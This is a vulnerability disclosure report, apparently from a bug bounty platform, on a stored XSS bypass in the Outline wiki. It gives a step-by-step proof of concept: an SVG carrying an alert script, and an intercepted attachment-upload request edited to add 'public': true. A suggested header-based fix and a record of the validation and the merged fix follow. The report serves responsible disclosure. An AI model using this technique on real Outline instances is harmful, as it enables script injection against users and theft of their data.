[Bypass] Cross-site Scripting (XSS) via file upload in outline/outline

Valid

Reported on

Jul 17th 2022


🔒️ Requirements

Privileges: User.

📝 Description

I found a bypass of the earlier report: uploading the file with the "public": true parameter. This works because the public folder of the AWS bucket does not force a download when its files are accessed, so the SVG is rendered inline by the browser.

🕵️‍♂️ Proof of Concept

Step 1: Go to your Outline home and create a new note.

[Screenshot: new-note.png]

Step 2: Start Burp Suite with Proxy -> Intercept set to on.

[Screenshot: burp01.png]

Step 3: Add the following .svg file to the note by typing /file and pressing [ENTER].

<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>

Step 4: In Burp Suite, press Forward until you see:

POST /api/attachments.create HTTP/1.1
Host: esaipslack.getoutline.com
Content-Length: 111
...
Connection: close

{
    "documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca",
    "contentType": "image/svg+xml",
    "size": 129,
    "name": "xss.svg"
}

Step 5: Add "public": true inside the JSON body.

{
    "public": true,
    "documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca",
    "contentType": "image/svg+xml",
    "size": 129,
    "name": "xss.svg"
}

Step 6: Forward the request and turn Intercept off.

[Screenshot: burp02.png]

Step 7: Go to your note and click on the file.

  • File: [Screenshot: file.png]

  • XSS: [Screenshot: xss.png]

🔨 Fix

To fix this vulnerability, I suggest forcing a download (Content-Disposition: attachment) for files served from the public part of the AWS bucket as well, not only from the private part.
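As an added illustration of the suggested fix (example code, not Outline's own), the following Node.js helper decides the response headers for serving an uploaded attachment: content types a browser would execute script from (image/svg+xml, HTML, XML) are always forced to download, whatever the value of the "public" flag. The function and set names are assumptions, and `assert` is used only for the self-check.

```javascript
// Added example, not Outline's code. buildAttachmentHeaders and the
// type sets below are assumed names chosen for this illustration.

// Content types a browser will execute script from when rendered inline.
const ACTIVE_CONTENT_TYPES = new Set([
  "image/svg+xml",
  "text/html",
  "application/xhtml+xml",
  "text/xml",
  "application/xml",
]);

// Content types that are safe to render inline (no script execution).
const INLINE_SAFE_TYPES = new Set([
  "image/png", "image/jpeg", "image/gif", "image/webp",
]);

// Strip characters that could break out of the Content-Disposition header.
function safeFilename(name) {
  const cleaned = String(name || "").replace(/[^\w.\-]/g, "_").slice(0, 255);
  return cleaned || "download";
}

// Returns the headers an attachment endpoint should emit. `isPublic`
// mirrors the "public" flag from the report; it may only relax the
// decision for inline-safe images, never for active content.
function buildAttachmentHeaders({ contentType, name, isPublic }) {
  const type = String(contentType || "application/octet-stream")
    .toLowerCase().split(";")[0].trim();
  const filename = safeFilename(name);
  const headers = {
    // Stop the browser from guessing a more dangerous type.
    "X-Content-Type-Options": "nosniff",
    // Even if something is rendered, no script, no network, no origin.
    "Content-Security-Policy": "default-src 'none'; sandbox",
  };
  if (isPublic && INLINE_SAFE_TYPES.has(type)) {
    headers["Content-Type"] = type;
    headers["Content-Disposition"] = `inline; filename="${filename}"`;
  } else {
    // Active content (SVG, HTML, XML) and anything unknown always downloads;
    // active types are additionally served as opaque bytes.
    headers["Content-Type"] = ACTIVE_CONTENT_TYPES.has(type)
      ? "application/octet-stream" : type;
    headers["Content-Disposition"] = `attachment; filename="${filename}"`;
  }
  return headers;
}
```

The same decision applies whether the file is served by the app or via bucket object metadata: a public SVG upload must reach the browser as a download, not as a rendered document.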

Impact

An attacker could use this to run script in the context of the Outline instance and obtain sensitive information stored in the AWS bucket.

We are processing your report and will contact the outline team within 24 hours. 17 days ago
We have contacted a member of the outline team and are waiting to hear back 16 days ago
Tom Moor validated this vulnerability 16 days ago
Mizu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Moor confirmed that a fix has been merged on 9dd28d 16 days ago
The fix bounty has been dropped